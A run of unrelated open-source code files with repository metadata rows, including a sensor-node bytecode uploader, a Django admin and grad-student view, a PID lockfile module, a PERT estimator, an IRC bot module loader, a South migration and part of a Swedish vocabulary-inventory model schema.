return False
def findIncludePosition( self, list, item ):
try:
return list.index( item )
except:
return None
| gpl-2.0 | -6,610,807,520,888,053,000 | 50.962664 | 267 | 0.53011 | false | 4.710483 | false | false | false |
wukong-m2m/NanoKong | tools/inteldemo201202/reprogram.py | 1 | 3181 | #!/usr/bin/python
import sys
import pynvc
def reprogramNvmdefault(destination, filename):
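    """Upload an NVM bytecode image to a node and reset it.
    Flow, as implemented below: REPRG_OPEN negotiates the page size, the
    image is streamed in 16-byte REPRG_WRITE chunks (an OK or RETRANSMIT
    reply is awaited at every page boundary, and a retransmit request
    rewinds the write position), REPRG_COMMIT finalises the upload, and
    SETRUNLVL resets the node.
    """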
MESSAGESIZE = 16
reply = pynvc.sendWithRetryAndCheckedReceive(destination=destination,
command=pynvc.REPRG_OPEN,
allowedReplies=[pynvc.REPRG_OPEN_R],
quitOnFailure=True)
pagesize = reply[1]*256 + reply[2]
lines = [" " + l.replace('0x','').replace(',','').replace('\n','') for l in open(filename).readlines() if l.startswith('0x')]
bytecode = []
for l in lines:
for b in l.split():
bytecode.append(int(b, 16))
print "Uploading", len(bytecode), "bytes."
packetLost = False
pos = 0
    while pos != len(bytecode):
payload_pos = [pos/256, pos%256]
payload_data = bytecode[pos:pos+MESSAGESIZE]
if pos/pagesize == (pos+len(payload_data))/pagesize:
            if not packetLost and pos == 32:
print "------------->Simulating packet loss"
# drop this one packet
packetLost = True
else:
pynvc.sendcmd(destination, pynvc.REPRG_WRITE, payload_pos+payload_data)
pos += len(payload_data)
else:
# Send last packet of this page and wait for a REPRG_WRITE_R_RETRANSMIT after each full page
reply = pynvc.sendWithRetryAndCheckedReceive(destination=destination,
command=pynvc.REPRG_WRITE,
allowedReplies=[pynvc.REPRG_WRITE_R_OK, pynvc.REPRG_WRITE_R_RETRANSMIT],
payload=payload_pos+payload_data,
quitOnFailure=True)
print "Page boundary reached, wait for REPRG_WRITE_R_OK or REPRG_WRITE_R_RETRANSMIT"
if reply[0] == pynvc.REPRG_WRITE_R_OK:
print "Received REPRG_WRITE_R_OK in reply to packet writing at", payload_pos
pos += len(payload_data)
else:
pos = reply[1]*256 + reply[2]
print "===========>Received REPRG_WRITE_R_RETRANSMIT request to retransmit from ", pos
# Send REPRG_COMMIT after last packet
if pos == len(bytecode):
reply = pynvc.sendWithRetryAndCheckedReceive(
destination=destination,
command=pynvc.REPRG_COMMIT,
allowedReplies=[pynvc.REPRG_COMMIT_R_RETRANSMIT,
pynvc.REPRG_COMMIT_R_FAILED,
pynvc.REPRG_COMMIT_R_OK],
payload=[pos/256, pos%256],
quitOnFailure=True)
if reply[0] == pynvc.REPRG_COMMIT_R_OK:
print reply
print "Commit OK."
elif reply[0] == pynvc.REPRG_COMMIT_R_RETRANSMIT:
pos = reply[1]*256 + reply[2]
print "===========>Received REPRG_COMMIT_R_RETRANSMIT request to retransmit from ", pos
else:
print "Commit failed."
quit()
pynvc.sendcmd(destination, pynvc.SETRUNLVL, [pynvc.RUNLVL_RESET])
if __name__ == "__main__":
pynvc.init()
reprogramNvmdefault(int(sys.argv[1]), sys.argv[2])
| gpl-2.0 | -2,236,280,340,222,188,800 | 41.986486 | 127 | 0.552028 | false | 3.716121 | false | false | false |
lillisgary/mezzanine-newsue | build/lib.linux-x86_64-2.7/sue/admin.py | 2 | 1414 | from django.contrib import admin
from mezzanine.pages.admin import PageAdmin
from .models import HomePage, Slide, Portfolio, PortfolioItem, PortfolioItemImage, PortfolioItemCategory, Porter, TempPortfolio, ItemPorter, Portfolios, DocumentListItem, DocumentList, DocumentListItemCategory
from mezzanine.core.admin import TabularDynamicInlineAdmin
class SlideInline(TabularDynamicInlineAdmin):
model = Slide
class PorterInline(TabularDynamicInlineAdmin):
model = Porter
class ItemPorterInline(TabularDynamicInlineAdmin):
model = ItemPorter
class HomePageAdmin(PageAdmin):
inlines = (SlideInline, PorterInline,)
class TempPortfolioAdmin(PageAdmin):
inlines = (ItemPorterInline,)
class PortfolioItemImageInline(TabularDynamicInlineAdmin):
model = PortfolioItemImage
class PortfolioItemAdmin(PageAdmin):
inlines = (PortfolioItemImageInline,)
class DocumentListItemInline(TabularDynamicInlineAdmin):
model = DocumentListItem
class DocumentListAdmin(PageAdmin):
inlines = (DocumentListItemInline,)
admin.site.register(HomePage, HomePageAdmin)
admin.site.register(TempPortfolio, TempPortfolioAdmin)
admin.site.register(Portfolio, PageAdmin)
admin.site.register(Portfolios, PageAdmin)
admin.site.register(PortfolioItemCategory)
admin.site.register(PortfolioItem, PortfolioItemAdmin)
admin.site.register(DocumentList, DocumentListAdmin)
admin.site.register(DocumentListItemCategory)
| bsd-2-clause | -4,301,660,201,645,536,000 | 33.487805 | 209 | 0.834512 | false | 3.740741 | false | false | false |
Peddle/hue | desktop/core/ext-py/python-daemon/daemon/pidlockfile.py | 42 | 5946 | # -*- coding: utf-8 -*-
# daemon/pidlockfile.py
# Part of python-daemon, an implementation of PEP 3143.
#
# Copyright © 2008–2009 Ben Finney <[email protected]>
#
# This is free software: you may copy, modify, and/or distribute this work
# under the terms of the Python Software Foundation License, version 2 or
# later as published by the Python Software Foundation.
# No warranty expressed or implied. See the file LICENSE.PSF-2 for details.
""" Lockfile behaviour implemented via Unix PID files.
"""
import os
import errno
from lockfile import (
LinkFileLock,
AlreadyLocked, LockFailed,
NotLocked, NotMyLock,
)
class PIDFileError(Exception):
""" Abstract base class for errors specific to PID files. """
class PIDFileParseError(ValueError, PIDFileError):
""" Raised when parsing contents of PID file fails. """
class PIDLockFile(LinkFileLock, object):
""" Lockfile implemented as a Unix PID file.
The PID file is named by the attribute `path`. When locked,
the file will be created with a single line of text,
containing the process ID (PID) of the process that acquired
the lock.
The lock is acquired and maintained as per `LinkFileLock`.
"""
def read_pid(self):
""" Get the PID from the lock file.
"""
result = read_pid_from_pidfile(self.path)
return result
def acquire(self, *args, **kwargs):
""" Acquire the lock.
Locks the PID file then creates the PID file for this
lock. The `timeout` parameter is used as for the
`LinkFileLock` class.
"""
super(PIDLockFile, self).acquire(*args, **kwargs)
try:
write_pid_to_pidfile(self.path)
except OSError, exc:
error = LockFailed("%(exc)s" % vars())
raise error
def release(self):
""" Release the lock.
Removes the PID file then releases the lock, or raises an
error if the current process does not hold the lock.
"""
if self.i_am_locking():
remove_existing_pidfile(self.path)
super(PIDLockFile, self).release()
def break_lock(self):
""" Break an existing lock.
If the lock is held, breaks the lock and removes the PID
file.
"""
super(PIDLockFile, self).break_lock()
remove_existing_pidfile(self.path)
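# A minimal usage sketch (illustrative, not part of the original module):
# guard a long-running process with a PID file lock. acquire(), release()
# and the timeout behaviour come from the lockfile.LinkFileLock base class.
def _example_usage(path='/tmp/example.pid'):
    lock = PIDLockFile(path)
    lock.acquire(timeout=5)
    try:
        pass  # long-running work protected by the lock goes here
    finally:
        lock.release()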
class TimeoutPIDLockFile(PIDLockFile):
""" Lockfile with default timeout, implemented as a Unix PID file.
This uses the ``PIDLockFile`` implementation, with the
following changes:
* The `acquire_timeout` parameter to the initialiser will be
used as the default `timeout` parameter for the `acquire`
method.
"""
def __init__(self, path, acquire_timeout=None, *args, **kwargs):
""" Set up the parameters of a DaemonRunnerLock. """
self.acquire_timeout = acquire_timeout
super(TimeoutPIDLockFile, self).__init__(path, *args, **kwargs)
def acquire(self, timeout=None, *args, **kwargs):
""" Acquire the lock. """
if timeout is None:
timeout = self.acquire_timeout
super(TimeoutPIDLockFile, self).acquire(timeout, *args, **kwargs)
def read_pid_from_pidfile(pidfile_path):
""" Read the PID recorded in the named PID file.
Read and return the numeric PID recorded as text in the named
PID file. If the PID file does not exist, return ``None``. If
the content is not a valid PID, raise ``PIDFileParseError``.
"""
pid = None
pidfile = None
try:
pidfile = open(pidfile_path, 'r')
except IOError, exc:
if exc.errno == errno.ENOENT:
pass
else:
raise
if pidfile:
# According to the FHS 2.3 section on PID files in ‘/var/run’:
#
# The file must consist of the process identifier in
# ASCII-encoded decimal, followed by a newline character. …
#
# Programs that read PID files should be somewhat flexible
# in what they accept; i.e., they should ignore extra
# whitespace, leading zeroes, absence of the trailing
# newline, or additional lines in the PID file.
line = pidfile.readline().strip()
try:
pid = int(line)
except ValueError:
raise PIDFileParseError(
"PID file %(pidfile_path)r contents invalid" % vars())
pidfile.close()
return pid
def write_pid_to_pidfile(pidfile_path):
""" Write the PID in the named PID file.
Get the numeric process ID (“PID”) of the current process
and write it to the named file as a line of text.
"""
open_flags = (os.O_CREAT | os.O_EXCL | os.O_WRONLY)
open_mode = (
((os.R_OK | os.W_OK) << 6) |
((os.R_OK) << 3) |
((os.R_OK)))
pidfile_fd = os.open(pidfile_path, open_flags, open_mode)
pidfile = os.fdopen(pidfile_fd, 'w')
# According to the FHS 2.3 section on PID files in ‘/var/run’:
#
# The file must consist of the process identifier in
# ASCII-encoded decimal, followed by a newline character. For
# example, if crond was process number 25, /var/run/crond.pid
# would contain three characters: two, five, and newline.
pid = os.getpid()
line = "%(pid)d\n" % vars()
pidfile.write(line)
pidfile.close()
def remove_existing_pidfile(pidfile_path):
""" Remove the named PID file if it exists.
Remove the named PID file. Ignore the condition if the file
does not exist, since that only means we are already in the
desired state.
"""
try:
os.remove(pidfile_path)
except OSError, exc:
if exc.errno == errno.ENOENT:
pass
else:
raise
| apache-2.0 | 2,624,831,999,551,938,600 | 28.944444 | 75 | 0.609884 | false | 4.080523 | false | false | false |
tapatron/pert-calc | pert.py | 1 | 3254 | #!/usr/bin/env python
# copyright (c) 2014 Stein Fletcher <[email protected]>
#
# Purpose: A simple utility to estimate tasks using PERT
# Usage:
# pert --tasks="1,2,4 5,7,11 7,11,22"
#
# which calculates the total duration (including risk) of 3 tasks
# task1: optimistic: 1, nominal: 2, pessimistic: 4
# task2: optimistic: 5, nominal: 7, pessimistic: 11
# task3: optimistic: 7, nominal: 11, pessimistic: 22
from math import pow, sqrt
import errno
import argparse
class Task(object):
def __init__(self, opt, nom, pes):
self.opt = opt
self.nom = nom
self.pes = pes
class Estimation(object):
def __init__(self):
self.tasks = []
def add_task(self, task):
self.tasks.append(task)
def get_duration(self):
return Calculator.total_duration(self.tasks)
def get_uncertainty(self):
return Calculator.total_uncertainty(self.tasks)
def get_estimate(self):
return Calculator.estimate(self.tasks)
def print_report(self):
for index, task in enumerate(self.tasks):
print "[{0}: (O:{1}), (N:{2}), (P:{3})] | duration: {4}, risk: {5}".format(
index + 1
, task.opt
, task.nom
, task.pes
, round(Calculator.expected_duration(task), 2)
, round(Calculator.uncertainty(task), 2)
)
print "Final estimate: {}".format(round(self.get_estimate(), 2))
class Calculator(object):
@staticmethod
def estimate(tasks):
return (Calculator.total_duration(tasks) +
Calculator.total_uncertainty(tasks))
@staticmethod
def total_duration(tasks):
return sum([Calculator.expected_duration(task) for task in tasks])
@staticmethod
def total_uncertainty(tasks):
return sqrt(sum([pow(Calculator.uncertainty(task), 2) for task in tasks]))
@staticmethod
def expected_duration(task):
return (task.opt + 4*task.nom + task.pes) / 6
@staticmethod
def uncertainty(task):
return (task.pes - task.opt) / 6
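# Worked sketch (illustrative, not part of the original tool): the header's
# example task "1,2,4" gives duration (1 + 4*2 + 4) / 6 ~= 2.17 and risk
# (4 - 1) / 6 = 0.5; per-task risks combine as the root of the sum of
# squares. Floats matter here: under Python 2, integer inputs would make
# "/ 6" floor-divide, which is why main() converts every value with float().
def _example_estimate():
    est = Estimation()
    for opt, nom, pes in [(1.0, 2.0, 4.0), (5.0, 7.0, 11.0), (7.0, 11.0, 22.0)]:
        est.add_task(Task(opt=opt, nom=nom, pes=pes))
    return est.get_estimate()  # ~24.41 for these three tasks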
def main():
def validate_params(params):
task_list = params['tasks'].split()
if len(task_list) < 1:
print "No tasks specified"
parser.print_help()
exit(errno.EINVAL)
for element in task_list:
element_params = element.split(',')
if len(element_params) != 3:
print "Invalid number of task attributes"
parser.print_help()
exit(errno.EINVAL)
return task_list
parser = argparse.ArgumentParser(description='A command line PERT calculator for quick \'n dirty estimates')
parser.add_argument(
'--tasks',
help='a comma separated task list in the form "1,2,12 4,5,9 2,3,6", where whitespace separates tasks',
required=True)
args = vars(parser.parse_args())
tasks = validate_params(args)
estimation = Estimation()
for task in tasks:
attrs = [float(val) for val in task.split(',')]
t = Task(opt=attrs[0], nom=attrs[1], pes=attrs[2])
estimation.add_task(t)
estimation.print_report()
exit(0)
if __name__ == '__main__':
main()
| mit | 4,799,152,905,269,200,000 | 27.79646 | 112 | 0.594653 | false | 3.672686 | false | false | false |
hrkfdn/cherry | modules.py | 1 | 1938 | import inspect
import imp
from irc import IRCConn
from console import Console
MODULES = ["mod_tv", "mod_imdb", "mod_yt", "mod_weather", "mod_8ball", "mod_hlquery", "mod_kiez", "mod_wc", "mod_wa"]
class Modules():
# dictionary with modname mapped to (module, obj)
modules = {}
def instantiate(self, m):
for attr in dir(m):
attr = getattr(m, attr)
if(inspect.isclass(attr) and
inspect.getmodule(attr) == m and
issubclass(attr, BaseModule)):
return attr()
def __init__(self):
global MODULES
for s in MODULES:
self.load(s)
def load(self, name):
try:
m = __import__(name)
self.modules[name] = (m, self.instantiate(m))
print("Loaded %s." % name)
except Exception as e:
print("Could not load module %s: %s" % (name, e))
def reload(self):
for key, val in self.modules.items():
print("Reloading %s .." % (key))
try:
reloadedmod = imp.reload(val[0])
newinstance = self.instantiate(reloadedmod)
self.modules[key] = (reloadedmod, newinstance)
except Exception as e:
print("Could not reload module %s: %s" (key, e))
def onprivmsg(self, conn, sender, to, message):
for key, val in self.modules.items():
try:
val[1].onprivmsg(conn, sender, to, message)
except Exception as e:
excname = type(e).__name__
print("Error running privmsg() handler in %s: %s: %s" % (key, excname, e))
class BaseModule():
def onprivmsg(self, conn, sender, to, message):
pass
def extractarg(self, trigger, message):
if message.startswith(trigger):
_, arg = message.split(trigger, 1)
return arg.lstrip()
return None
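# Hedged example (not part of the original file): a minimal bot module built
# on BaseModule. extractarg("!echo", "!echo hi there") returns "hi there";
# non-matching messages yield None. The conn.privmsg() call is an assumption
# about IRCConn's API, not something defined in this file.
class _ExampleEchoModule(BaseModule):
    def onprivmsg(self, conn, sender, to, message):
        arg = self.extractarg("!echo", message)
        if arg is not None:
            conn.privmsg(to, arg)  # assumed IRCConn send method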
| bsd-3-clause | -8,024,597,456,429,800,000 | 31.3 | 117 | 0.534572 | false | 3.852883 | false | false | false |
brente/djangocms-youtube-slider | djangocms_youtube_slider/south_migrations/0001_initial.py | 2 | 4426 | # -*- coding: utf-8 -*-
from south.db import db
from south.v2 import SchemaMigration
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'YoutubeVideoContainer'
db.create_table(u'cmsplugin_youtubevideocontainer', (
(u'cmsplugin_ptr', self.gf('django.db.models.fields.related.OneToOneField')(to=orm['cms.CMSPlugin'], unique=True, primary_key=True)),
('description', self.gf('django.db.models.fields.CharField')(max_length=100, null=True, blank=True)),
))
db.send_create_signal(u'djangocms_youtube_slider', ['YoutubeVideoContainer'])
# Adding model 'YoutubeVideoSlide'
db.create_table(u'cmsplugin_youtubevideoslide', (
(u'cmsplugin_ptr', self.gf('django.db.models.fields.related.OneToOneField')(to=orm['cms.CMSPlugin'], unique=True, primary_key=True)),
('slider', self.gf('django.db.models.fields.related.ForeignKey')(related_name='slides', to=orm['djangocms_youtube_slider.YoutubeVideoContainer'])),
('video_link', self.gf('django.db.models.fields.CharField')(max_length=200)),
))
db.send_create_signal(u'djangocms_youtube_slider', ['YoutubeVideoSlide'])
def backwards(self, orm):
# Deleting model 'YoutubeVideoContainer'
db.delete_table(u'cmsplugin_youtubevideocontainer')
# Deleting model 'YoutubeVideoSlide'
db.delete_table(u'cmsplugin_youtubevideoslide')
models = {
'cms.cmsplugin': {
'Meta': {'object_name': 'CMSPlugin'},
'changed_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'creation_date': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language': ('django.db.models.fields.CharField', [], {'max_length': '15', 'db_index': 'True'}),
'level': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'lft': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cms.CMSPlugin']", 'null': 'True', 'blank': 'True'}),
'placeholder': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cms.Placeholder']", 'null': 'True'}),
'plugin_type': ('django.db.models.fields.CharField', [], {'max_length': '50', 'db_index': 'True'}),
'position': ('django.db.models.fields.PositiveSmallIntegerField', [], {'null': 'True', 'blank': 'True'}),
'rght': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'tree_id': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'})
},
'cms.placeholder': {
'Meta': {'object_name': 'Placeholder'},
'default_width': ('django.db.models.fields.PositiveSmallIntegerField', [], {'null': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'slot': ('django.db.models.fields.CharField', [], {'max_length': '50', 'db_index': 'True'})
},
u'djangocms_youtube_slider.youtubevideocontainer': {
'Meta': {'object_name': 'YoutubeVideoContainer', 'db_table': "u'cmsplugin_youtubevideocontainer'", '_ormbases': ['cms.CMSPlugin']},
u'cmsplugin_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['cms.CMSPlugin']", 'unique': 'True', 'primary_key': 'True'}),
'description': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'})
},
u'djangocms_youtube_slider.youtubevideoslide': {
'Meta': {'object_name': 'YoutubeVideoSlide', 'db_table': "u'cmsplugin_youtubevideoslide'", '_ormbases': ['cms.CMSPlugin']},
u'cmsplugin_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['cms.CMSPlugin']", 'unique': 'True', 'primary_key': 'True'}),
'slider': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'slides'", 'to': u"orm['djangocms_youtube_slider.YoutubeVideoContainer']"}),
'video_link': ('django.db.models.fields.CharField', [], {'max_length': '200'})
}
}
    complete_apps = ['djangocms_youtube_slider']
| mit | 8,185,830,980,724,661,000 | 65.074627 | 167 | 0.607094 | false | 3.642798 | false | false | false |
sfu-fas/coursys | grad/views/manage_supervisors.py | 1 | 1865 | from courselib.auth import requires_role
from django.shortcuts import get_object_or_404, render
from grad.models import GradStudent, Supervisor, GradRequirement
from grad.forms import SupervisorForm, possible_supervisors
from django.contrib import messages
from log.models import LogEntry
from django.http import HttpResponseRedirect
from django.urls import reverse
@requires_role("GRAD")
def manage_supervisors(request, grad_slug):
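    """List a grad student's committee members and, on POST, add a new one:
    the Supervisor record is saved, the change is logged, and the user is
    redirected back to this page."""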
grad = get_object_or_404(GradStudent, slug=grad_slug, program__unit__in=request.units)
supervisors = Supervisor.objects.filter(student=grad).select_related('supervisor')
supervisor_people = [s.supervisor for s in supervisors if s.supervisor]
if request.method == 'POST':
form = SupervisorForm(request.POST)
form.set_supervisor_choices(possible_supervisors([grad.program.unit], extras=supervisor_people, null=True))
if form.is_valid():
s = form.save(commit=False)
s.modified_by = request.user.username
s.student = grad
s.save()
messages.success(request, "Added committee member for %s." % (grad))
l = LogEntry(userid=request.user.username,
description="Added committee member %s for %s." % (s, grad.person.userid),
related_object=s)
l.save()
return HttpResponseRedirect(reverse('grad:manage_supervisors', kwargs={'grad_slug':grad_slug}))
else:
form = SupervisorForm()
form.set_supervisor_choices(possible_supervisors([grad.program.unit], extras=supervisor_people, null=True))
context = {
'form': form,
'supervisors': supervisors,
'grad': grad,
'can_edit': True,
}
return render(request, 'grad/manage_supervisors.html', context)
| gpl-3.0 | -9,047,068,081,236,019,000 | 44.487805 | 115 | 0.654155 | false | 4.045553 | false | false | false |
langcog/wordbank | instruments/schemas/Swedish_WG.py | 1 | 63685 | from django.db import models
from instruments.base import BaseTable
class Swedish_WG(BaseTable):
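    # Schema for the Swedish CDI Words & Gestures form: one field per
    # vocabulary item, each recording whether the child "understands" or
    # "produces" that word (null when the item is unmarked).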
item_1_choices = [('understands', 'understands'), ('produces', 'produces')]
item_1 = models.CharField(max_length=11, choices=item_1_choices, null=True)
item_2_choices = [('understands', 'understands'), ('produces', 'produces')]
item_2 = models.CharField(max_length=11, choices=item_2_choices, null=True)
item_3_choices = [('understands', 'understands'), ('produces', 'produces')]
item_3 = models.CharField(max_length=11, choices=item_3_choices, null=True)
item_4_choices = [('understands', 'understands'), ('produces', 'produces')]
item_4 = models.CharField(max_length=11, choices=item_4_choices, null=True)
item_5_choices = [('understands', 'understands'), ('produces', 'produces')]
item_5 = models.CharField(max_length=11, choices=item_5_choices, null=True)
item_6_choices = [('understands', 'understands'), ('produces', 'produces')]
item_6 = models.CharField(max_length=11, choices=item_6_choices, null=True)
item_7_choices = [('understands', 'understands'), ('produces', 'produces')]
item_7 = models.CharField(max_length=11, choices=item_7_choices, null=True)
item_8_choices = [('understands', 'understands'), ('produces', 'produces')]
item_8 = models.CharField(max_length=11, choices=item_8_choices, null=True)
item_9_choices = [('understands', 'understands'), ('produces', 'produces')]
item_9 = models.CharField(max_length=11, choices=item_9_choices, null=True)
item_10_choices = [('understands', 'understands'), ('produces', 'produces')]
item_10 = models.CharField(max_length=11, choices=item_10_choices, null=True)
item_11_choices = [('understands', 'understands'), ('produces', 'produces')]
item_11 = models.CharField(max_length=11, choices=item_11_choices, null=True)
item_12_choices = [('understands', 'understands'), ('produces', 'produces')]
item_12 = models.CharField(max_length=11, choices=item_12_choices, null=True)
item_13_choices = [('understands', 'understands'), ('produces', 'produces')]
item_13 = models.CharField(max_length=11, choices=item_13_choices, null=True)
item_14_choices = [('understands', 'understands'), ('produces', 'produces')]
item_14 = models.CharField(max_length=11, choices=item_14_choices, null=True)
item_15_choices = [('understands', 'understands'), ('produces', 'produces')]
item_15 = models.CharField(max_length=11, choices=item_15_choices, null=True)
item_16_choices = [('understands', 'understands'), ('produces', 'produces')]
item_16 = models.CharField(max_length=11, choices=item_16_choices, null=True)
item_17_choices = [('understands', 'understands'), ('produces', 'produces')]
item_17 = models.CharField(max_length=11, choices=item_17_choices, null=True)
item_18_choices = [('understands', 'understands'), ('produces', 'produces')]
item_18 = models.CharField(max_length=11, choices=item_18_choices, null=True)
item_19_choices = [('understands', 'understands'), ('produces', 'produces')]
item_19 = models.CharField(max_length=11, choices=item_19_choices, null=True)
item_20_choices = [('understands', 'understands'), ('produces', 'produces')]
item_20 = models.CharField(max_length=11, choices=item_20_choices, null=True)
item_21_choices = [('understands', 'understands'), ('produces', 'produces')]
item_21 = models.CharField(max_length=11, choices=item_21_choices, null=True)
item_22_choices = [('understands', 'understands'), ('produces', 'produces')]
item_22 = models.CharField(max_length=11, choices=item_22_choices, null=True)
item_23_choices = [('understands', 'understands'), ('produces', 'produces')]
item_23 = models.CharField(max_length=11, choices=item_23_choices, null=True)
item_24_choices = [('understands', 'understands'), ('produces', 'produces')]
item_24 = models.CharField(max_length=11, choices=item_24_choices, null=True)
item_25_choices = [('understands', 'understands'), ('produces', 'produces')]
item_25 = models.CharField(max_length=11, choices=item_25_choices, null=True)
item_26_choices = [('understands', 'understands'), ('produces', 'produces')]
item_26 = models.CharField(max_length=11, choices=item_26_choices, null=True)
item_27_choices = [('understands', 'understands'), ('produces', 'produces')]
item_27 = models.CharField(max_length=11, choices=item_27_choices, null=True)
item_28_choices = [('understands', 'understands'), ('produces', 'produces')]
item_28 = models.CharField(max_length=11, choices=item_28_choices, null=True)
item_29_choices = [('understands', 'understands'), ('produces', 'produces')]
item_29 = models.CharField(max_length=11, choices=item_29_choices, null=True)
item_30_choices = [('understands', 'understands'), ('produces', 'produces')]
item_30 = models.CharField(max_length=11, choices=item_30_choices, null=True)
item_31_choices = [('understands', 'understands'), ('produces', 'produces')]
item_31 = models.CharField(max_length=11, choices=item_31_choices, null=True)
item_32_choices = [('understands', 'understands'), ('produces', 'produces')]
item_32 = models.CharField(max_length=11, choices=item_32_choices, null=True)
item_33_choices = [('understands', 'understands'), ('produces', 'produces')]
item_33 = models.CharField(max_length=11, choices=item_33_choices, null=True)
item_34_choices = [('understands', 'understands'), ('produces', 'produces')]
item_34 = models.CharField(max_length=11, choices=item_34_choices, null=True)
item_35_choices = [('understands', 'understands'), ('produces', 'produces')]
item_35 = models.CharField(max_length=11, choices=item_35_choices, null=True)
item_36_choices = [('understands', 'understands'), ('produces', 'produces')]
item_36 = models.CharField(max_length=11, choices=item_36_choices, null=True)
item_37_choices = [('understands', 'understands'), ('produces', 'produces')]
item_37 = models.CharField(max_length=11, choices=item_37_choices, null=True)
item_38_choices = [('understands', 'understands'), ('produces', 'produces')]
item_38 = models.CharField(max_length=11, choices=item_38_choices, null=True)
item_39_choices = [('understands', 'understands'), ('produces', 'produces')]
item_39 = models.CharField(max_length=11, choices=item_39_choices, null=True)
item_40_choices = [('understands', 'understands'), ('produces', 'produces')]
item_40 = models.CharField(max_length=11, choices=item_40_choices, null=True)
item_41_choices = [('understands', 'understands'), ('produces', 'produces')]
item_41 = models.CharField(max_length=11, choices=item_41_choices, null=True)
item_42_choices = [('understands', 'understands'), ('produces', 'produces')]
item_42 = models.CharField(max_length=11, choices=item_42_choices, null=True)
item_43_choices = [('understands', 'understands'), ('produces', 'produces')]
item_43 = models.CharField(max_length=11, choices=item_43_choices, null=True)
item_44_choices = [('understands', 'understands'), ('produces', 'produces')]
item_44 = models.CharField(max_length=11, choices=item_44_choices, null=True)
item_45_choices = [('understands', 'understands'), ('produces', 'produces')]
item_45 = models.CharField(max_length=11, choices=item_45_choices, null=True)
item_46_choices = [('understands', 'understands'), ('produces', 'produces')]
item_46 = models.CharField(max_length=11, choices=item_46_choices, null=True)
item_47_choices = [('understands', 'understands'), ('produces', 'produces')]
item_47 = models.CharField(max_length=11, choices=item_47_choices, null=True)
item_48_choices = [('understands', 'understands'), ('produces', 'produces')]
item_48 = models.CharField(max_length=11, choices=item_48_choices, null=True)
item_49_choices = [('understands', 'understands'), ('produces', 'produces')]
item_49 = models.CharField(max_length=11, choices=item_49_choices, null=True)
item_50_choices = [('understands', 'understands'), ('produces', 'produces')]
item_50 = models.CharField(max_length=11, choices=item_50_choices, null=True)
item_51_choices = [('understands', 'understands'), ('produces', 'produces')]
item_51 = models.CharField(max_length=11, choices=item_51_choices, null=True)
item_52_choices = [('understands', 'understands'), ('produces', 'produces')]
item_52 = models.CharField(max_length=11, choices=item_52_choices, null=True)
item_53_choices = [('understands', 'understands'), ('produces', 'produces')]
item_53 = models.CharField(max_length=11, choices=item_53_choices, null=True)
item_54_choices = [('understands', 'understands'), ('produces', 'produces')]
item_54 = models.CharField(max_length=11, choices=item_54_choices, null=True)
item_55_choices = [('understands', 'understands'), ('produces', 'produces')]
item_55 = models.CharField(max_length=11, choices=item_55_choices, null=True)
item_56_choices = [('understands', 'understands'), ('produces', 'produces')]
item_56 = models.CharField(max_length=11, choices=item_56_choices, null=True)
item_57_choices = [('understands', 'understands'), ('produces', 'produces')]
item_57 = models.CharField(max_length=11, choices=item_57_choices, null=True)
item_58_choices = [('understands', 'understands'), ('produces', 'produces')]
item_58 = models.CharField(max_length=11, choices=item_58_choices, null=True)
item_59_choices = [('understands', 'understands'), ('produces', 'produces')]
item_59 = models.CharField(max_length=11, choices=item_59_choices, null=True)
item_60_choices = [('understands', 'understands'), ('produces', 'produces')]
item_60 = models.CharField(max_length=11, choices=item_60_choices, null=True)
item_61_choices = [('understands', 'understands'), ('produces', 'produces')]
item_61 = models.CharField(max_length=11, choices=item_61_choices, null=True)
item_62_choices = [('understands', 'understands'), ('produces', 'produces')]
item_62 = models.CharField(max_length=11, choices=item_62_choices, null=True)
item_63_choices = [('understands', 'understands'), ('produces', 'produces')]
item_63 = models.CharField(max_length=11, choices=item_63_choices, null=True)
item_64_choices = [('understands', 'understands'), ('produces', 'produces')]
item_64 = models.CharField(max_length=11, choices=item_64_choices, null=True)
item_65_choices = [('understands', 'understands'), ('produces', 'produces')]
item_65 = models.CharField(max_length=11, choices=item_65_choices, null=True)
item_66_choices = [('understands', 'understands'), ('produces', 'produces')]
item_66 = models.CharField(max_length=11, choices=item_66_choices, null=True)
item_67_choices = [('understands', 'understands'), ('produces', 'produces')]
item_67 = models.CharField(max_length=11, choices=item_67_choices, null=True)
item_68_choices = [('understands', 'understands'), ('produces', 'produces')]
item_68 = models.CharField(max_length=11, choices=item_68_choices, null=True)
item_69_choices = [('understands', 'understands'), ('produces', 'produces')]
item_69 = models.CharField(max_length=11, choices=item_69_choices, null=True)
item_70_choices = [('understands', 'understands'), ('produces', 'produces')]
item_70 = models.CharField(max_length=11, choices=item_70_choices, null=True)
item_71_choices = [('understands', 'understands'), ('produces', 'produces')]
item_71 = models.CharField(max_length=11, choices=item_71_choices, null=True)
item_72_choices = [('understands', 'understands'), ('produces', 'produces')]
item_72 = models.CharField(max_length=11, choices=item_72_choices, null=True)
item_73_choices = [('understands', 'understands'), ('produces', 'produces')]
item_73 = models.CharField(max_length=11, choices=item_73_choices, null=True)
item_74_choices = [('understands', 'understands'), ('produces', 'produces')]
item_74 = models.CharField(max_length=11, choices=item_74_choices, null=True)
item_75_choices = [('understands', 'understands'), ('produces', 'produces')]
item_75 = models.CharField(max_length=11, choices=item_75_choices, null=True)
item_76_choices = [('understands', 'understands'), ('produces', 'produces')]
item_76 = models.CharField(max_length=11, choices=item_76_choices, null=True)
item_77_choices = [('understands', 'understands'), ('produces', 'produces')]
item_77 = models.CharField(max_length=11, choices=item_77_choices, null=True)
item_78_choices = [('understands', 'understands'), ('produces', 'produces')]
item_78 = models.CharField(max_length=11, choices=item_78_choices, null=True)
item_79_choices = [('understands', 'understands'), ('produces', 'produces')]
